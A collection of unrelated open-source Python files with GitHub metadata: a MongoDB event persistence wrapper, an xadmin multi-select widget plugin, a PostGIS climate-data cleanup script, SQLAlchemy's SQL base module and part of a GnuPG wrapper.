failed['inserts'] += 1
else:
_event.canceled = False
original_event = encoder.decode(original)
if original_event != _event:
_event.last_modified_time = datetime.now()
result = self.db.events.replace_one(original, encoder.encode(_event))
""" @type : pymongo.results.UpdateResult """
if result.modified_count > 0:
success['updates'] += 1
else:
failed['updates'] += 1
else:
skipped += 1
if delete:
what = {"cal_id": {"$nin": ids}, "type": {"$in": types}, "start_time": {"$gte": min_date, "$lte": max_date}}
cursor = self.db.events.find(what)
for db_event in cursor:
search = {
"cal_id": db_event["cal_id"],
"type": db_event["type"],
}
if 'start_date' in db_event:
search["start_date"] = db_event["start_date"]
if 'end_date' in db_event:
search["end_date"] = db_event["end_date"]
canceled = self.db.events.find_one_and_update(search, {"$set": {"canceled": True}},
return_document=ReturnDocument.AFTER)
if canceled["canceled"]:
success['deleted'] += 1
else:
failed['deleted'] += 1
if self.debug:
print("SKIP: %d" % skipped)
print(" OK: INS:%d UPD:%d DEL:%d" % (success["inserts"], success["updates"], success["deleted"]))
if (failed["inserts"] + failed["updates"] + failed["deleted"]) > 0:
print(" NOK: INS:%d UPD:%d DEL:%d" % (failed["inserts"], failed["updates"], failed["deleted"]))
return True
    def load_events(self, event_types, start_time, end_time=None):
        decoder = EventEncoder()
        _events = []
        if not isinstance(self.db, Database):
            if self.debug:
                print("Could not load from MongoDB")
            return _events
        # with end_time=None a literal {"$lte": None} filter would match nothing
        time_filter = {"$gte": start_time}
        if end_time is not None:
            time_filter["$lte"] = end_time
        what = {"type": {"$in": event_types}, "start_time": time_filter, "canceled": False}
        cursor = self.db.events.find(what)
        # max_time_ms is a method; assigning to the attribute would silently do nothing
        cursor = cursor.max_time_ms(200)
try:
if not cursor.alive or cursor.count() == 0:
return _events
except PyMongoError:
return _events
for event in cursor:
_event = decoder.decode(event)
if isinstance(_event, Event):
_events.append(_event)
return _events
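    # Minimal usage sketch (event types and the date window are illustrative):
    #
    #   from datetime import datetime, timedelta
    #   wrapper = MongoWrapper(debug=True)
    #   wrapper.save(events)  # upserts current events, cancels stale ones
    #   upcoming = wrapper.load_events(['match'], datetime.now(),
    #                                  datetime.now() + timedelta(weeks=4))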
| {
"content_hash": "43bfd6b186a81187b1bc9ce8ee1cf19a",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 179,
"avg_line_length": 39.524193548387096,
"alnum_prop": 0.4986737400530504,
"repo_name": "lpbm/tlcal",
"id": "c78761d8d8ebeeaeec36d7ec14a1bd59d6d86109",
"size": "4901",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "persist/mongowrapper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "22574"
}
],
"symlink_target": ""
} |
from itertools import chain
import xadmin
from django import forms
from django.db.models import ManyToManyField
from django.forms.utils import flatatt
from django.template import loader
from django.utils.encoding import force_unicode
from django.utils.html import escape, conditional_escape
from django.utils.safestring import mark_safe
from xadmin.util import vendor
from xadmin.views import BaseAdminPlugin, ModelFormAdminView
class SelectMultipleTransfer(forms.SelectMultiple):
@property
def media(self):
return vendor('xadmin.widget.select-transfer.js', 'xadmin.widget.select-transfer.css')
def __init__(self, verbose_name, is_stacked, attrs=None, choices=()):
self.verbose_name = verbose_name
self.is_stacked = is_stacked
super(SelectMultipleTransfer, self).__init__(attrs, choices)
def render_opt(self, selected_choices, option_value, option_label):
option_value = force_unicode(option_value)
return u'<option value="%s">%s</option>' % (
escape(option_value), conditional_escape(force_unicode(option_label))), bool(option_value in selected_choices)
def render(self, name, value, attrs=None, choices=()):
if attrs is None:
attrs = {}
attrs['class'] = ''
if self.is_stacked:
attrs['class'] += 'stacked'
if value is None:
value = []
final_attrs = self.build_attrs(attrs, name=name)
selected_choices = set(force_unicode(v) for v in value)
available_output = []
chosen_output = []
for option_value, option_label in chain(self.choices, choices):
if isinstance(option_label, (list, tuple)):
available_output.append(u'<optgroup label="%s">' %
escape(force_unicode(option_value)))
for option in option_label:
output, selected = self.render_opt(
selected_choices, *option)
if selected:
chosen_output.append(output)
else:
available_output.append(output)
available_output.append(u'</optgroup>')
else:
output, selected = self.render_opt(
selected_choices, option_value, option_label)
if selected:
chosen_output.append(output)
else:
available_output.append(output)
context = {
'verbose_name': self.verbose_name,
'attrs': attrs,
'field_id': attrs['id'],
'flatatts': flatatt(final_attrs),
'available_options': u'\n'.join(available_output),
'chosen_options': u'\n'.join(chosen_output),
}
return mark_safe(loader.render_to_string('xadmin/forms/transfer.html', context))
class SelectMultipleDropdown(forms.SelectMultiple):
@property
def media(self):
return vendor('multiselect.js', 'multiselect.css', 'xadmin.widget.multiselect.js')
def render(self, name, value, attrs=None, choices=()):
if attrs is None:
attrs = {}
attrs['class'] = 'selectmultiple selectdropdown'
return super(SelectMultipleDropdown, self).render(name, value, attrs, choices)
class M2MSelectPlugin(BaseAdminPlugin):
def init_request(self, *args, **kwargs):
return hasattr(self.admin_view, 'style_fields') and \
(
'm2m_transfer' in self.admin_view.style_fields.values() or
'm2m_dropdown' in self.admin_view.style_fields.values()
)
def get_field_style(self, attrs, db_field, style, **kwargs):
if style == 'm2m_transfer' and isinstance(db_field, ManyToManyField):
return {'widget': SelectMultipleTransfer(db_field.verbose_name, False), 'help_text': ''}
if style == 'm2m_dropdown' and isinstance(db_field, ManyToManyField):
return {'widget': SelectMultipleDropdown, 'help_text': ''}
return attrs
xadmin.site.register_plugin(M2MSelectPlugin, ModelFormAdminView)
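# Minimal sketch of how an admin class opts into these widgets -- assuming a
# model with a many-to-many `tags` field (names are illustrative):
#
#   class PostAdmin(object):
#       style_fields = {'tags': 'm2m_transfer'}  # or 'm2m_dropdown'
#   xadmin.site.register(Post, PostAdmin)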
| {
"content_hash": "7309adac60ba7cfb2786ad11c7ec3107",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 122,
"avg_line_length": 40.10377358490566,
"alnum_prop": 0.5951540813926135,
"repo_name": "LennonChin/Django-Practices",
"id": "eabb2cc229396b360d6b43d0bd5970e021104c21",
"size": "4266",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "MxOnline/extra_apps/xadmin/plugins/multiselect.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP",
"bytes": "1538"
},
{
"name": "CSS",
"bytes": "513444"
},
{
"name": "HTML",
"bytes": "501361"
},
{
"name": "Java",
"bytes": "588"
},
{
"name": "JavaScript",
"bytes": "1810740"
},
{
"name": "PHP",
"bytes": "19336"
},
{
"name": "Python",
"bytes": "1739514"
}
],
"symlink_target": ""
} |
import psycopg2
import sys
import os
from collections import OrderedDict
# define queries
# a plain dict has no guaranteed iteration order on Python 2, and
# drop_world_poly must run after the queries that still use the table
QUERIES = OrderedDict()
# delete not land surface data
QUERIES['delete_not_land_surface_data'] = ("""
DELETE FROM tambora_temperature_monthly WHERE event_id in (SELECT event_id FROM tambora_temperature_monthly AS AA
LEFT JOIN world_coastline_50m_poly as BB
ON ST_Intersects(ST_SetSRID(ST_MakePoint(AA.lon,AA.lat),4326),BB.geom)
WHERE BB.gid is null
AND AA.location_id != 7902);
""")
# delete events outside central europe
QUERIES['delete_outside_central_eu'] = ("""
DELETE FROM tambora_temperature_monthly WHERE event_id not in (SELECT event_id FROM tambora_temperature_monthly AS AA
LEFT JOIN temperature_cru_mean as BB
ON ST_Intersects(ST_SetSRID(ST_MakePoint(AA.lon,AA.lat),4326),BB.rast)
WHERE BB.month = 1
AND AA.location_id != 7902);
""")
# delete world poly shape
QUERIES['drop_world_poly'] = ("""
DROP TABLE world_coastline_50m_poly;
""")
# get command line arguments
dbHost = sys.argv[1]
dbName = sys.argv[2]
dbUser = sys.argv[3]
dbPass = sys.argv[4]
shpFile = sys.argv[5]
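# Example invocation (illustrative values; the positional arguments are
# host, database, user, password, shapefile):
#   python checkTambora.py localhost tambora tambora_user secret world_coastline_50m_poly.shp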
con = None
# upload world polygon vector data to db
os.system("/usr/bin/shp2pgsql -s 4326 " + str(shpFile) + " public.world_coastline_50m_poly | psql -d "+dbName+" -U "+dbUser)
try:
con = psycopg2.connect(host=dbHost, database=dbName, user=dbUser, password=dbPass)
cur = con.cursor()
    for name, ddl in QUERIES.items():
try:
print("Execute Query {}: ".format(name))
cur.execute(ddl)
except psycopg2.Error as err:
con.rollback()
            print(err.pgerror)
else:
print("OK")
except psycopg2.DatabaseError as e:
    print('Error %s' % e)
sys.exit(1)
finally:
if con:
con.commit()
        con.close()
| {
"content_hash": "c1a412f25e0a99682cddbb6daa43930d",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 124,
"avg_line_length": 28.453125,
"alnum_prop": 0.6447007138934652,
"repo_name": "ElenorFrisbee/MSC",
"id": "f9f9e71c0227903d505a7487c616f08ba9f85a82",
"size": "1859",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "regmodR/startup_scripts/checkTambora.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "48977"
},
{
"name": "HTML",
"bytes": "31471"
},
{
"name": "JavaScript",
"bytes": "553274"
},
{
"name": "PHP",
"bytes": "90352"
},
{
"name": "Python",
"bytes": "36062"
},
{
"name": "R",
"bytes": "122184"
},
{
"name": "Shell",
"bytes": "13192"
}
],
"symlink_target": ""
} |
"""Foundational utilities common to many sql modules.
"""
from .. import util, exc
import itertools
from .visitors import ClauseVisitor
import re
import collections
PARSE_AUTOCOMMIT = util.symbol('PARSE_AUTOCOMMIT')
NO_ARG = util.symbol('NO_ARG')
class Immutable(object):
"""mark a ClauseElement as 'immutable' when expressions are cloned."""
def unique_params(self, *optionaldict, **kwargs):
raise NotImplementedError("Immutable objects do not support copying")
def params(self, *optionaldict, **kwargs):
raise NotImplementedError("Immutable objects do not support copying")
def _clone(self):
return self
def _from_objects(*elements):
return itertools.chain(*[element._from_objects for element in elements])
@util.decorator
def _generative(fn, *args, **kw):
"""Mark a method as generative."""
self = args[0]._generate()
fn(self, *args[1:], **kw)
return self
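# Sketch of the generative pattern (hypothetical subclass, for illustration):
#
#     class Query(Generative):
#         @_generative
#         def limit(self, n):
#             self._limit = n   # mutates the shallow copy made by _generate()
#
#     q2 = q1.limit(10)         # q1 is left untouched; q2 carries _limit == 10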
class _DialectArgView(collections.MutableMapping):
"""A dictionary view of dialect-level arguments in the form
<dialectname>_<argument_name>.
"""
def __init__(self, obj):
self.obj = obj
def _key(self, key):
try:
dialect, value_key = key.split("_", 1)
except ValueError:
raise KeyError(key)
else:
return dialect, value_key
def __getitem__(self, key):
dialect, value_key = self._key(key)
try:
opt = self.obj.dialect_options[dialect]
except exc.NoSuchModuleError:
raise KeyError(key)
else:
return opt[value_key]
def __setitem__(self, key, value):
try:
dialect, value_key = self._key(key)
except KeyError:
raise exc.ArgumentError(
"Keys must be of the form <dialectname>_<argname>")
else:
self.obj.dialect_options[dialect][value_key] = value
def __delitem__(self, key):
dialect, value_key = self._key(key)
del self.obj.dialect_options[dialect][value_key]
def __len__(self):
return sum(len(args._non_defaults) for args in
self.obj.dialect_options.values())
def __iter__(self):
return (
"%s_%s" % (dialect_name, value_name)
for dialect_name in self.obj.dialect_options
for value_name in self.obj.dialect_options[dialect_name]._non_defaults
)
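# Illustrative mapping of the flat key form to the nested registry
# (dialect and argument names here are assumptions):
#     view['mysql_length']  ->  view.obj.dialect_options['mysql']['length']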
class _DialectArgDict(collections.MutableMapping):
"""A dictionary view of dialect-level arguments for a specific
dialect.
Maintains a separate collection of user-specified arguments
and dialect-specified default arguments.
"""
def __init__(self):
self._non_defaults = {}
self._defaults = {}
def __len__(self):
return len(set(self._non_defaults).union(self._defaults))
def __iter__(self):
return iter(set(self._non_defaults).union(self._defaults))
def __getitem__(self, key):
if key in self._non_defaults:
return self._non_defaults[key]
else:
return self._defaults[key]
def __setitem__(self, key, value):
self._non_defaults[key] = value
def __delitem__(self, key):
del self._non_defaults[key]
class DialectKWArgs(object):
"""Establish the ability for a class to have dialect-specific arguments
with defaults and constructor validation.
The :class:`.DialectKWArgs` interacts with the
:attr:`.DefaultDialect.construct_arguments` present on a dialect.
.. seealso::
:attr:`.DefaultDialect.construct_arguments`
"""
@classmethod
def argument_for(cls, dialect_name, argument_name, default):
"""Add a new kind of dialect-specific keyword argument for this class.
E.g.::
Index.argument_for("mydialect", "length", None)
some_index = Index('a', 'b', mydialect_length=5)
        The :meth:`.DialectKWArgs.argument_for` method is a per-argument
        way of adding extra arguments to the :attr:`.DefaultDialect.construct_arguments`
dictionary. This dictionary provides a list of argument names accepted by
various schema-level constructs on behalf of a dialect.
New dialects should typically specify this dictionary all at once as a data
member of the dialect class. The use case for ad-hoc addition of
argument names is typically for end-user code that is also using
a custom compilation scheme which consumes the additional arguments.
:param dialect_name: name of a dialect. The dialect must be locatable,
else a :class:`.NoSuchModuleError` is raised. The dialect must
also include an existing :attr:`.DefaultDialect.construct_arguments` collection,
indicating that it participates in the keyword-argument validation and
default system, else :class:`.ArgumentError` is raised.
If the dialect does not include this collection, then any keyword argument
can be specified on behalf of this dialect already. All dialects
packaged within SQLAlchemy include this collection, however for third
party dialects, support may vary.
:param argument_name: name of the parameter.
:param default: default value of the parameter.
.. versionadded:: 0.9.4
"""
construct_arg_dictionary = DialectKWArgs._kw_registry[dialect_name]
if construct_arg_dictionary is None:
            raise exc.ArgumentError("Dialect '%s' does not have keyword-argument "
                                    "validation and defaults enabled" %
                                    dialect_name)
if cls not in construct_arg_dictionary:
construct_arg_dictionary[cls] = {}
construct_arg_dictionary[cls][argument_name] = default
@util.memoized_property
def dialect_kwargs(self):
"""A collection of keyword arguments specified as dialect-specific
options to this construct.
The arguments are present here in their original ``<dialect>_<kwarg>``
format. Only arguments that were actually passed are included;
unlike the :attr:`.DialectKWArgs.dialect_options` collection, which
contains all options known by this dialect including defaults.
The collection is also writable; keys are accepted of the
form ``<dialect>_<kwarg>`` where the value will be assembled
into the list of options.
.. versionadded:: 0.9.2
.. versionchanged:: 0.9.4 The :attr:`.DialectKWArgs.dialect_kwargs`
collection is now writable.
.. seealso::
:attr:`.DialectKWArgs.dialect_options` - nested dictionary form
"""
return _DialectArgView(self)
@property
def kwargs(self):
"""A synonym for :attr:`.DialectKWArgs.dialect_kwargs`."""
return self.dialect_kwargs
@util.dependencies("sqlalchemy.dialects")
def _kw_reg_for_dialect(dialects, dialect_name):
dialect_cls = dialects.registry.load(dialect_name)
if dialect_cls.construct_arguments is None:
return None
return dict(dialect_cls.construct_arguments)
_kw_registry = util.PopulateDict(_kw_reg_for_dialect)
def _kw_reg_for_dialect_cls(self, dialect_name):
construct_arg_dictionary = DialectKWArgs._kw_registry[dialect_name]
d = _DialectArgDict()
if construct_arg_dictionary is None:
d._defaults.update({"*": None})
else:
for cls in reversed(self.__class__.__mro__):
if cls in construct_arg_dictionary:
d._defaults.update(construct_arg_dictionary[cls])
return d
@util.memoized_property
def dialect_options(self):
"""A collection of keyword arguments specified as dialect-specific
options to this construct.
This is a two-level nested registry, keyed to ``<dialect_name>``
and ``<argument_name>``. For example, the ``postgresql_where`` argument
would be locatable as::
arg = my_object.dialect_options['postgresql']['where']
.. versionadded:: 0.9.2
.. seealso::
:attr:`.DialectKWArgs.dialect_kwargs` - flat dictionary form
"""
return util.PopulateDict(
util.portable_instancemethod(self._kw_reg_for_dialect_cls)
)
def _validate_dialect_kwargs(self, kwargs):
# validate remaining kwargs that they all specify DB prefixes
if not kwargs:
return
for k in kwargs:
m = re.match('^(.+?)_(.+)$', k)
if not m:
raise TypeError("Additional arguments should be "
"named <dialectname>_<argument>, got '%s'" % k)
dialect_name, arg_name = m.group(1, 2)
try:
construct_arg_dictionary = self.dialect_options[dialect_name]
except exc.NoSuchModuleError:
util.warn(
"Can't validate argument %r; can't "
"locate any SQLAlchemy dialect named %r" %
(k, dialect_name))
self.dialect_options[dialect_name] = d = _DialectArgDict()
d._defaults.update({"*": None})
d._non_defaults[arg_name] = kwargs[k]
else:
if "*" not in construct_arg_dictionary and \
arg_name not in construct_arg_dictionary:
raise exc.ArgumentError(
"Argument %r is not accepted by "
"dialect %r on behalf of %r" % (
k,
dialect_name, self.__class__
))
else:
construct_arg_dictionary[arg_name] = kwargs[k]
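# Illustrative outcomes of the validation above (dialect/argument names are
# assumptions, not taken from any real dialect's construct_arguments):
#     {'mysql_engine': 'InnoDB'}  -> stored, if the mysql dialect declares
#                                    'engine' (or a '*' wildcard) for this class
#     {'mysql_bogus_arg': 1}      -> exc.ArgumentError, argument not accepted
#     {'badform': 1}              -> TypeError, key lacks the <dialect>_<arg> shape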
class Generative(object):
"""Allow a ClauseElement to generate itself via the
@_generative decorator.
"""
def _generate(self):
s = self.__class__.__new__(self.__class__)
s.__dict__ = self.__dict__.copy()
return s
class Executable(Generative):
"""Mark a ClauseElement as supporting execution.
:class:`.Executable` is a superclass for all "statement" types
of objects, including :func:`select`, :func:`delete`, :func:`update`,
:func:`insert`, :func:`text`.
"""
supports_execution = True
_execution_options = util.immutabledict()
_bind = None
@_generative
def execution_options(self, **kw):
""" Set non-SQL options for the statement which take effect during
execution.
Execution options can be set on a per-statement or
per :class:`.Connection` basis. Additionally, the
:class:`.Engine` and ORM :class:`~.orm.query.Query` objects provide
access to execution options which they in turn configure upon
connections.
The :meth:`execution_options` method is generative. A new
instance of this statement is returned that contains the options::
statement = select([table.c.x, table.c.y])
statement = statement.execution_options(autocommit=True)
Note that only a subset of possible execution options can be applied
to a statement - these include "autocommit" and "stream_results",
but not "isolation_level" or "compiled_cache".
See :meth:`.Connection.execution_options` for a full list of
possible options.
.. seealso::
:meth:`.Connection.execution_options()`
:meth:`.Query.execution_options()`
"""
if 'isolation_level' in kw:
raise exc.ArgumentError(
"'isolation_level' execution option may only be specified "
"on Connection.execution_options(), or "
"per-engine using the isolation_level "
"argument to create_engine()."
)
if 'compiled_cache' in kw:
raise exc.ArgumentError(
"'compiled_cache' execution option may only be specified "
"on Connection.execution_options(), not per statement."
)
self._execution_options = self._execution_options.union(kw)
def execute(self, *multiparams, **params):
"""Compile and execute this :class:`.Executable`."""
e = self.bind
if e is None:
label = getattr(self, 'description', self.__class__.__name__)
            msg = ('This %s is not directly bound to a Connection or Engine. '
                   'Use the .execute() method of a Connection or Engine '
                   'to execute this construct.' % label)
raise exc.UnboundExecutionError(msg)
return e._execute_clauseelement(self, multiparams, params)
def scalar(self, *multiparams, **params):
"""Compile and execute this :class:`.Executable`, returning the
result's scalar representation.
"""
return self.execute(*multiparams, **params).scalar()
@property
def bind(self):
"""Returns the :class:`.Engine` or :class:`.Connection` to
which this :class:`.Executable` is bound, or None if none found.
This is a traversal which checks locally, then
checks among the "from" clauses of associated objects
until a bound engine or connection is found.
"""
if self._bind is not None:
return self._bind
for f in _from_objects(self):
if f is self:
continue
engine = f.bind
if engine is not None:
return engine
else:
return None
class SchemaEventTarget(object):
"""Base class for elements that are the targets of :class:`.DDLEvents`
events.
This includes :class:`.SchemaItem` as well as :class:`.SchemaType`.
"""
def _set_parent(self, parent):
"""Associate with this SchemaEvent's parent object."""
raise NotImplementedError()
def _set_parent_with_dispatch(self, parent):
self.dispatch.before_parent_attach(self, parent)
self._set_parent(parent)
self.dispatch.after_parent_attach(self, parent)
class SchemaVisitor(ClauseVisitor):
"""Define the visiting for ``SchemaItem`` objects."""
__traverse_options__ = {'schema_visitor': True}
class ColumnCollection(util.OrderedProperties):
"""An ordered dictionary that stores a list of ColumnElement
instances.
Overrides the ``__eq__()`` method to produce SQL clauses between
sets of correlated columns.
"""
def __init__(self):
super(ColumnCollection, self).__init__()
self.__dict__['_all_col_set'] = util.column_set()
self.__dict__['_all_columns'] = []
def __str__(self):
return repr([str(c) for c in self])
def replace(self, column):
"""add the given column to this collection, removing unaliased
versions of this column as well as existing columns with the
same key.
e.g.::
t = Table('sometable', metadata, Column('col1', Integer))
t.columns.replace(Column('col1', Integer, key='columnone'))
        will remove the original 'col1' from the collection, and add
        the new column under the name 'columnone'.
Used by schema.Column to override columns during table reflection.
"""
remove_col = None
if column.name in self and column.key != column.name:
other = self[column.name]
if other.name == other.key:
remove_col = other
self._all_col_set.remove(other)
del self._data[other.key]
if column.key in self._data:
remove_col = self._data[column.key]
self._all_col_set.remove(remove_col)
self._all_col_set.add(column)
self._data[column.key] = column
if remove_col is not None:
self._all_columns[:] = [column if c is remove_col
else c for c in self._all_columns]
else:
self._all_columns.append(column)
def add(self, column):
"""Add a column to this collection.
The key attribute of the column will be used as the hash key
for this dictionary.
"""
if not column.key:
raise exc.ArgumentError(
"Can't add unnamed column to column collection")
self[column.key] = column
def __delitem__(self, key):
raise NotImplementedError()
def __setattr__(self, key, object):
raise NotImplementedError()
def __setitem__(self, key, value):
if key in self:
# this warning is primarily to catch select() statements
# which have conflicting column names in their exported
# columns collection
existing = self[key]
if not existing.shares_lineage(value):
util.warn('Column %r on table %r being replaced by '
'%r, which has the same key. Consider '
'use_labels for select() statements.' % (key,
getattr(existing, 'table', None), value))
# pop out memoized proxy_set as this
# operation may very well be occurring
# in a _make_proxy operation
util.memoized_property.reset(value, "proxy_set")
self._all_col_set.add(value)
self._all_columns.append(value)
self._data[key] = value
def clear(self):
raise NotImplementedError()
def remove(self, column):
del self._data[column.key]
self._all_col_set.remove(column)
self._all_columns[:] = [c for c in self._all_columns if c is not column]
def update(self, iter):
cols = list(iter)
self._all_columns.extend(c for label, c in cols if c not in self._all_col_set)
self._all_col_set.update(c for label, c in cols)
self._data.update((label, c) for label, c in cols)
def extend(self, iter):
cols = list(iter)
self._all_columns.extend(c for c in cols if c not in self._all_col_set)
self._all_col_set.update(cols)
self._data.update((c.key, c) for c in cols)
__hash__ = None
@util.dependencies("sqlalchemy.sql.elements")
def __eq__(self, elements, other):
l = []
for c in getattr(other, "_all_columns", other):
for local in self._all_columns:
if c.shares_lineage(local):
l.append(c == local)
return elements.and_(*l)
def __contains__(self, other):
if not isinstance(other, util.string_types):
raise exc.ArgumentError("__contains__ requires a string argument")
return util.OrderedProperties.__contains__(self, other)
def __getstate__(self):
return {'_data': self.__dict__['_data'],
'_all_columns': self.__dict__['_all_columns']}
def __setstate__(self, state):
self.__dict__['_data'] = state['_data']
self.__dict__['_all_columns'] = state['_all_columns']
self.__dict__['_all_col_set'] = util.column_set(state['_all_columns'])
def contains_column(self, col):
# this has to be done via set() membership
return col in self._all_col_set
def as_immutable(self):
return ImmutableColumnCollection(self._data, self._all_col_set, self._all_columns)
class ImmutableColumnCollection(util.ImmutableProperties, ColumnCollection):
def __init__(self, data, colset, all_columns):
util.ImmutableProperties.__init__(self, data)
self.__dict__['_all_col_set'] = colset
self.__dict__['_all_columns'] = all_columns
extend = remove = util.ImmutableProperties._immutable
class ColumnSet(util.ordered_column_set):
def contains_column(self, col):
return col in self
def extend(self, cols):
for col in cols:
self.add(col)
def __add__(self, other):
return list(self) + list(other)
@util.dependencies("sqlalchemy.sql.elements")
def __eq__(self, elements, other):
l = []
for c in other:
for local in self:
if c.shares_lineage(local):
l.append(c == local)
return elements.and_(*l)
def __hash__(self):
return hash(tuple(x for x in self))
def _bind_or_error(schemaitem, msg=None):
bind = schemaitem.bind
if not bind:
name = schemaitem.__class__.__name__
label = getattr(schemaitem, 'fullname',
getattr(schemaitem, 'name', None))
if label:
item = '%s object %r' % (name, label)
else:
item = '%s object' % name
if msg is None:
msg = "%s is not bound to an Engine or Connection. "\
"Execution can not proceed without a database to execute "\
"against." % item
raise exc.UnboundExecutionError(msg)
return bind
| {
"content_hash": "1ea93316f47e28a0db33d126092d0f28",
"timestamp": "",
"source": "github",
"line_count": 620,
"max_line_length": 90,
"avg_line_length": 34.08387096774194,
"alnum_prop": 0.5924664016657203,
"repo_name": "michaelBenin/sqlalchemy",
"id": "28f324ad9d53568d5cc484a36c64d27a9e48a5d1",
"size": "21362",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/sqlalchemy/sql/base.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""
From sourceforge pycrypto project:
http://sourceforge.net/projects/pycrypto/
Code for running GnuPG from Python and dealing with the results.
===================================================================
Distribute and use freely; there are no restrictions on further
dissemination and usage except those imposed by the laws of your
country of residence. This software is provided "as is" without
warranty of fitness for use or suitability for any purpose, express
or implied. Use at your own risk or not at all.
===================================================================
Incorporating the code into commercial products is permitted; you do
not have to make source available or contribute your changes back
(though that would be nice).
--amk (www.amk.ca)
Detailed info about the format of data to/from gpg may be obtained from the
file DETAILS in the gnupg source.
Dependencies
- GPG must be installed
- http://www.gnupg.org
- http://www.gpg4win.org
Authors:
Andrew Kuchling
Richard Jones
Neil McNab
We are not using it, but the most current code appears to be at: https://pythonhosted.org/python-gnupg/
"""
__rcsid__ = "$Id: GPG.py,v 1.3 2003/11/23 15:03:15 akuchling Exp $"
import sys
if sys.version_info < (3,):
import StringIO
else:
import io as StringIO
import base64
import gettext
import locale
import os
import os.path
import subprocess
try:
import win32process
except ImportError:
pass
def translate():
"""
    Set up the translation path.
"""
if __name__ == "__main__":
try:
base = os.path.basename(__file__)[:-3]
localedir = os.path.join(os.path.dirname(__file__), "locale")
except NameError:
base = os.path.basename(sys.executable)[:-4]
localedir = os.path.join(os.path.dirname(sys.executable), "locale")
else:
temp = __name__.split(".")
base = temp[-1]
localedir = os.path.join("/".join(["%s" % k for k in temp[:-1]]), "locale")
# print base, localedir, locale.getdefaultlocale()
localelang = locale.getdefaultlocale()[0]
    if localelang is None:
localelang = "LC_ALL"
t = gettext.translation(base, localedir, [localelang], None, "en")
    try:
        return t.ugettext
    except AttributeError:
        # Python 3: gettext translation objects have no ugettext
        return t.gettext
_ = translate()
# Default path used for searching for the GPG binary
DEFAULT_PATH = [
"/bin",
"/usr/bin",
"/usr/local/bin",
"${PROGRAMFILES}\\GNU\\GnuPG",
"${PROGRAMFILES(X86)}\\GNU\\GnuPG",
"GPG",
"${SYSTEMDRIVE}\\cygwin\\bin",
"${SYSTEMDRIVE}\\cygwin\\usr\\bin",
"${SYSTEMDRIVE}\\cygwin\\usr\\local\\bin",
]
class Signature:
"""
Used to hold information about a signature result
"""
def __init__(self):
self.valid = 0
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
self.error = None
self.nopubkey = False
def NEWSIG(self, value):
pass
def BADSIG(self, value):
self.error = "BADSIG"
self.valid = 0
self.key_id, self.username = value.split(None, 1)
def GOODSIG(self, value):
self.valid = 1
# self.error = "GOODSIG"
self.key_id, self.username = value.split(None, 1)
def VALIDSIG(self, value):
# print value
# self.valid = 1
# self.error = "VALID_SIG"
self.fingerprint, self.creation_date, self.timestamp, other = value.split(
" ", 3
)
def SIG_ID(self, value):
# self.error = "SIG_ID"
self.signature_id, self.creation_date, self.timestamp = value.split(" ", 2)
def NODATA(self, value):
self.error = _("File not properly loaded for signature.")
def ERRSIG(self, value):
# print value
self.error = _("Signature error.")
def NO_PUBKEY(self, value):
self.key_id = value
self.nopubkey = True
self.error = _("Signature error, missing public key with id 0x%s.") % value[-8:]
def KEYEXPIRED(self, value):
self.error = _("Signature error, signing key expired at %s.") % value
def SIGEXPIRED(self, value):
return self.KEYEXPIRED(value)
def EXPKEYSIG(self, value):
# value is the name of the expired key
self.error = _("Signature error, valid but key expired, %s") % value
def TRUST_ULTIMATE(self, value):
"""
see http://cvs.gnupg.org/cgi-bin/viewcvs.cgi/trunk/doc/DETAILS?rev=289
        Trust settings do NOT determine if a signature is good or not! That is reserved for GOODSIG!
"""
return
def TRUST_UNDEFINED(self, value):
self.error = _("Trust undefined")
# print value.split()
# raise AssertionError, "File not properly loaded for signature."
def is_valid(self):
"""
        returns boolean result of signature validity
"""
return self.valid
class ImportResult:
"""
Used to hold information about a key import result
"""
counts = """count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported""".split()
def __init__(self):
self.imported = []
self.results = []
for result in self.counts:
setattr(self, result, None)
def NODATA(self, value):
self.results.append(
{"fingerprint": None, "problem": "0", "text": "No valid data found"}
)
def IMPORTED(self, value):
# this duplicates info we already see in import_ok and import_problem
pass
ok_reason = {
"0": "Not actually changed",
"1": "Entirely new key",
"2": "New user IDs",
"4": "New signatures",
"8": "New subkeys",
"16": "Contains private key",
}
def IMPORT_OK(self, value):
reason, fingerprint = value.split()
self.results.append(
{"fingerprint": fingerprint, "ok": reason, "text": self.ok_reason[reason]}
)
problem_reason = {
"0": "No specific reason given",
"1": "Invalid Certificate",
"2": "Issuer Certificate missing",
"3": "Certificate Chain too long",
"4": "Error storing certificate",
}
def IMPORT_PROBLEM(self, value):
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = "<unknown>"
self.results.append(
{
"fingerprint": fingerprint,
"problem": reason,
"text": self.problem_reason[reason],
}
)
def IMPORT_RES(self, value):
import_res = value.split()
for i in range(len(self.counts)):
setattr(self, self.counts[i], int(import_res[i]))
def KEYEXPIRED(self, value):
self.error = _("Signature error, signing key expired at %s.") % value
def SIGEXPIRED(self, value):
self.error = _("Signature error, signature expired at %s.") % value
def summary(self):
l = []
l.append("%d imported" % self.imported)
if self.not_imported:
l.append("%d not imported" % self.not_imported)
return ", ".join(l)
class ListResult:
"""Parse a --list-keys output
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
sub = subkey (secondary key)
sec = secret key
ssb = secret subkey (secondary key)
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
fpr = fingerprint: (fingerprint is in field 10)
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
"""
def __init__(self):
self.pub_keys = []
self.pk = None
def pub(self, args):
keyid = args[4]
date = args[5]
uid = args[9]
self.pk = {"keyid": keyid, "date": date, "uids": [uid]}
self.pub_keys.append(self.pk)
